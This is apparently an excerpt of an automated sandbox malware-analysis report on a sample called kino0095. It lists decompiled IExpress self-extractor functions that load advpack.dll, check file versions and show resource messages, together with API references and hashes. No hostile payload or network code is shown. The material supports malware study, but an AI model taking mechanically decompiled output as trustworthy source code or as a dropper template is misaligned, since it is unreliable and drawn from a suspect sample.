                                                                                                                                                                                                                                    0x010b3783
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3785
                                                                                                                                                                                                                                    0x010b378c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b378c
                                                                                                                                                                                                                                    0x010b3750
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b372d
                                                                                                                                                                                                                                    0x010b372d
                                                                                                                                                                                                                                    0x010b396b
                                                                                                                                                                                                                                    0x010b396b
                                                                                                                                                                                                                                    0x010b396c
                                                                                                                                                                                                                                    0x010b396e
                                                                                                                                                                                                                                    0x010b396f
                                                                                                                                                                                                                                    0x010b3a1e
                                                                                                                                                                                                                                    0x010b3a1e
                                                                                                                                                                                                                                    0x010b3a22
                                                                                                                                                                                                                                    0x010b3a27
                                                                                                                                                                                                                                    0x010b3a3e
                                                                                                                                                                                                                                    0x010b3a3e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010B3723
                                                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 010B39C3
                                                                                                                                                                                                                                    • MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 010B39F1
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Message$BeepVersion
                                                                                                                                                                                                                                    • String ID: 3$doza2
                                                                                                                                                                                                                                    • API String ID: 2519184315-2054879145
                                                                                                                                                                                                                                    • Opcode ID: b6c5698fc727746933a753d1c040bdbd8addd82e8ff969e09ec93839ae6e259b
                                                                                                                                                                                                                                    • Instruction ID: 4965a7860cc4769ebb97f1e4ddaab6893757470f56433dacd6739e0c0654133c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b6c5698fc727746933a753d1c040bdbd8addd82e8ff969e09ec93839ae6e259b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3691D171E012259BEBB58A19CCC1BEABBF4FB85304F2541EAC9C9AF241D7359980CF41
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B6495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E010B6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x10b8004; // 0x72151d89
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E010B1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
				_t26 = "advpack.dll";
				E010B658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E010B6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                                                    0x010b6495
                                                                                                                                                                                                                                    0x010b6495
                                                                                                                                                                                                                                    0x010b64a0
                                                                                                                                                                                                                                    0x010b64a7
                                                                                                                                                                                                                                    0x010b64ab
                                                                                                                                                                                                                                    0x010b64bd
                                                                                                                                                                                                                                    0x010b64c2
                                                                                                                                                                                                                                    0x010b64d3
                                                                                                                                                                                                                                    0x010b64df
                                                                                                                                                                                                                                    0x010b64e8
                                                                                                                                                                                                                                    0x010b6502
                                                                                                                                                                                                                                    0x010b64ee
                                                                                                                                                                                                                                    0x010b64f9
                                                                                                                                                                                                                                    0x010b64f9
                                                                                                                                                                                                                                    0x010b6516

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010B64DF
                                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010B64F9
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 010B6502
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                    • API String ID: 438848745-3761280616
                                                                                                                                                                                                                                    • Opcode ID: 0a5c45466931a6f13155c62d2a9af900fd0ba8a2640b9dd5abf67a1803e32295
                                                                                                                                                                                                                                    • Instruction ID: d4faa3a29464f36640414812b1ee0c43ef19a0d6691eccfe1bcd02f109a5612c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a5c45466931a6f13155c62d2a9af900fd0ba8a2640b9dd5abf67a1803e32295
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8201D170A14108ABDBA0DB64ECC8AEE7778EB60310F500299F5C5931C4DF76AE868B50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B28E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E010B2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E010B2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E010B2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                                                    0x010b28f1
                                                                                                                                                                                                                                    0x010b28f4
                                                                                                                                                                                                                                    0x010b28f7
                                                                                                                                                                                                                                    0x010b28f9
                                                                                                                                                                                                                                    0x010b28fc
                                                                                                                                                                                                                                    0x010b28ff
                                                                                                                                                                                                                                    0x010b2901
                                                                                                                                                                                                                                    0x010b2907
                                                                                                                                                                                                                                    0x010b2a62
                                                                                                                                                                                                                                    0x010b2a64
                                                                                                                                                                                                                                    0x010b290d
                                                                                                                                                                                                                                    0x010b290d
                                                                                                                                                                                                                                    0x010b290f
                                                                                                                                                                                                                                    0x010b2912
                                                                                                                                                                                                                                    0x010b2920
                                                                                                                                                                                                                                    0x010b2937
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2944
                                                                                                                                                                                                                                    0x010b294a
                                                                                                                                                                                                                                    0x010b294f
                                                                                                                                                                                                                                    0x010b2a2f
                                                                                                                                                                                                                                    0x010b2a32
                                                                                                                                                                                                                                    0x010b2a34
                                                                                                                                                                                                                                    0x010b2a37
                                                                                                                                                                                                                                    0x010b2a41
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2955
                                                                                                                                                                                                                                    0x010b295e
                                                                                                                                                                                                                                    0x010b2962
                                                                                                                                                                                                                                    0x010b2969
                                                                                                                                                                                                                                    0x010b296f
                                                                                                                                                                                                                                    0x010b2974
                                                                                                                                                                                                                                    0x010b298c
                                                                                                                                                                                                                                    0x010b2a20
                                                                                                                                                                                                                                    0x010b2a21
                                                                                                                                                                                                                                    0x010b2a27
                                                                                                                                                                                                                                    0x010b2a4c
                                                                                                                                                                                                                                    0x010b2a4f
                                                                                                                                                                                                                                    0x010b2a50
                                                                                                                                                                                                                                    0x010b2a53
                                                                                                                                                                                                                                    0x010b2a56
                                                                                                                                                                                                                                    0x010b2a5c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b29b2
                                                                                                                                                                                                                                    0x010b29b2
                                                                                                                                                                                                                                    0x010b29b5
                                                                                                                                                                                                                                    0x010b29bd
                                                                                                                                                                                                                                    0x010b29c3
                                                                                                                                                                                                                                    0x010b29cc
                                                                                                                                                                                                                                    0x010b29d5
                                                                                                                                                                                                                                    0x010b29d7
                                                                                                                                                                                                                                    0x010b29da
                                                                                                                                                                                                                                    0x010b29dd
                                                                                                                                                                                                                                    0x010b29df
                                                                                                                                                                                                                                    0x010b29ec
                                                                                                                                                                                                                                    0x010b29f8
                                                                                                                                                                                                                                    0x010b29fc
                                                                                                                                                                                                                                    0x010b29ff
                                                                                                                                                                                                                                    0x010b2a02
                                                                                                                                                                                                                                    0x010b2a07
                                                                                                                                                                                                                                    0x010b2a0a
                                                                                                                                                                                                                                    0x010b2a0f
                                                                                                                                                                                                                                    0x010b2a19
                                                                                                                                                                                                                                    0x010b2a81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b2a0f
                                                                                                                                                                                                                                    0x010b298c
                                                                                                                                                                                                                                    0x010b2974
                                                                                                                                                                                                                                    0x010b2962
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b294f
                                                                                                                                                                                                                                    0x010b2912
                                                                                                                                                                                                                                    0x010b2a65
                                                                                                                                                                                                                                    0x010b2a68
                                                                                                                                                                                                                                    0x010b2a6c
                                                                                                                                                                                                                                    0x010b2a6f
                                                                                                                                                                                                                                    0x010b2a6f
                                                                                                                                                                                                                                    0x010b2a7d

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 010B2A6F
                                                                                                                                                                                                                                      • Part of subcall function 010B2773: CharUpperA.USER32(72151D89,00000000,00000000,00000000), ref: 010B27A8
                                                                                                                                                                                                                                      • Part of subcall function 010B2773: CharNextA.USER32(0000054D), ref: 010B27B5
                                                                                                                                                                                                                                      • Part of subcall function 010B2773: CharNextA.USER32(00000000), ref: 010B27BC
                                                                                                                                                                                                                                      • Part of subcall function 010B2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2829
                                                                                                                                                                                                                                      • Part of subcall function 010B2773: RegQueryValueExA.ADVAPI32(?,010B1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2852
                                                                                                                                                                                                                                      • Part of subcall function 010B2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B2870
                                                                                                                                                                                                                                      • Part of subcall function 010B2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 010B28A0
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,010B3938,?,?,?,?,-00000005), ref: 010B2958
                                                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 010B2969
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,010B3938,?,?,?,?,-00000005,?), ref: 010B2A21
                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 010B2A81
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3949799724-0
                                                                                                                                                                                                                                    • Opcode ID: 50bcafa2eb575a1044ff8f3edac7797f69aed8d0e1545314cc81ec67e03e0ee2
                                                                                                                                                                                                                                    • Instruction ID: cb45880d1b7669969440f06c00b210cdb7b1ad23c9ed73ed95d42d918294c098
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50bcafa2eb575a1044ff8f3edac7797f69aed8d0e1545314cc81ec67e03e0ee2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D512931E00219EBDB22DF98D8C4AEEBBB5FF48700F14416AE995E7211DB35A941CB90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B47E0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E010B1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x10b91e0; // 0xef7a50
						 *(_t34 + 4) = _t11;
						 *0x10b91e0 = _t34;
						return 1;
					}
					_t25 =  *0x10b8584; // 0x0
					E010B44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x10b8584; // 0x0
				E010B44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}















                                                                                                                                                                                                                                    0x010b47e8
                                                                                                                                                                                                                                    0x010b47f0
                                                                                                                                                                                                                                    0x010b47f4
                                                                                                                                                                                                                                    0x010b480f
                                                                                                                                                                                                                                    0x010b4811
                                                                                                                                                                                                                                    0x010b4814
                                                                                                                                                                                                                                    0x010b4814
                                                                                                                                                                                                                                    0x010b4816
                                                                                                                                                                                                                                    0x010b4817
                                                                                                                                                                                                                                    0x010b4829
                                                                                                                                                                                                                                    0x010b482b
                                                                                                                                                                                                                                    0x010b482f
                                                                                                                                                                                                                                    0x010b484f
                                                                                                                                                                                                                                    0x010b4852
                                                                                                                                                                                                                                    0x010b4855
                                                                                                                                                                                                                                    0x010b4855
                                                                                                                                                                                                                                    0x010b4857
                                                                                                                                                                                                                                    0x010b4858
                                                                                                                                                                                                                                    0x010b4860
                                                                                                                                                                                                                                    0x010b4865
                                                                                                                                                                                                                                    0x010b486a
                                                                                                                                                                                                                                    0x010b486f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b4876
                                                                                                                                                                                                                                    0x010b4831
                                                                                                                                                                                                                                    0x010b4841
                                                                                                                                                                                                                                    0x010b4847
                                                                                                                                                                                                                                    0x010b480b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b480b
                                                                                                                                                                                                                                    0x010b47f6
                                                                                                                                                                                                                                    0x010b4806
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010B4E6F), ref: 010B47EA
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 010B4823
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010B4847
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Pz
                                                                                                                                                                                                                                    • API String ID: 359063898-2830093337
                                                                                                                                                                                                                                    • Opcode ID: fbbe18846edfbbd12820475b7dcf75190fdde10f5f553ec259164103df99961b
                                                                                                                                                                                                                                    • Instruction ID: d0a4c4ccd82378db318cd65dd56835b2931d7dfd86e5e8171a9e71c46f5aee37
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbbe18846edfbbd12820475b7dcf75190fdde10f5f553ec259164103df99961b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C91159B4600601AFD7658E2498D8FFA3B9EEBC5300B048859EEC3C7346CA3AC906C720
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B4169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E010B4169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E010B468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E010B468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E010B44B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E010B44B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                                                    0x010b417d
                                                                                                                                                                                                                                    0x010b418f
                                                                                                                                                                                                                                    0x010b4193
                                                                                                                                                                                                                                    0x010b41b7
                                                                                                                                                                                                                                    0x010b41d3
                                                                                                                                                                                                                                    0x010b41e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b41e7
                                                                                                                                                                                                                                    0x010b41d5
                                                                                                                                                                                                                                    0x010b41d6
                                                                                                                                                                                                                                    0x010b41d8
                                                                                                                                                                                                                                    0x010b41d9
                                                                                                                                                                                                                                    0x010b41da
                                                                                                                                                                                                                                    0x010b41df
                                                                                                                                                                                                                                    0x010b41e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b41e1
                                                                                                                                                                                                                                    0x010b41b9
                                                                                                                                                                                                                                    0x010b41ba
                                                                                                                                                                                                                                    0x010b41bc
                                                                                                                                                                                                                                    0x010b41bd
                                                                                                                                                                                                                                    0x010b41be
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b41be
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46A0
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: SizeofResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46A9
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010B46C3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LoadResource.KERNEL32(00000000,00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46CC
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: LockResource.KERNEL32(00000000,?,010B2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46D3
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: memcpy_s.MSVCRT ref: 010B46E5
                                                                                                                                                                                                                                      • Part of subcall function 010B468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010B46EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,010B30B4), ref: 010B4189
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,010B30B4), ref: 010B41E7
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010B4518
                                                                                                                                                                                                                                      • Part of subcall function 010B44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010B4554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                    • Opcode ID: 0328c3a639c506d33f63fc021e488a30f4ca5ae758aa773ad9bf24ecef7d682c
                                                                                                                                                                                                                                    • Instruction ID: bc8cd401ac6502bea6291c14f9f1d13ce78029b57fb817700f9ceb681d872b1d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0328c3a639c506d33f63fc021e488a30f4ca5ae758aa773ad9bf24ecef7d682c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9B0121B1B40214BBF32416699CD4FFB218EDBD8A84F004426BBC7E2182DE6CCE0001B4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 010B7155 Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
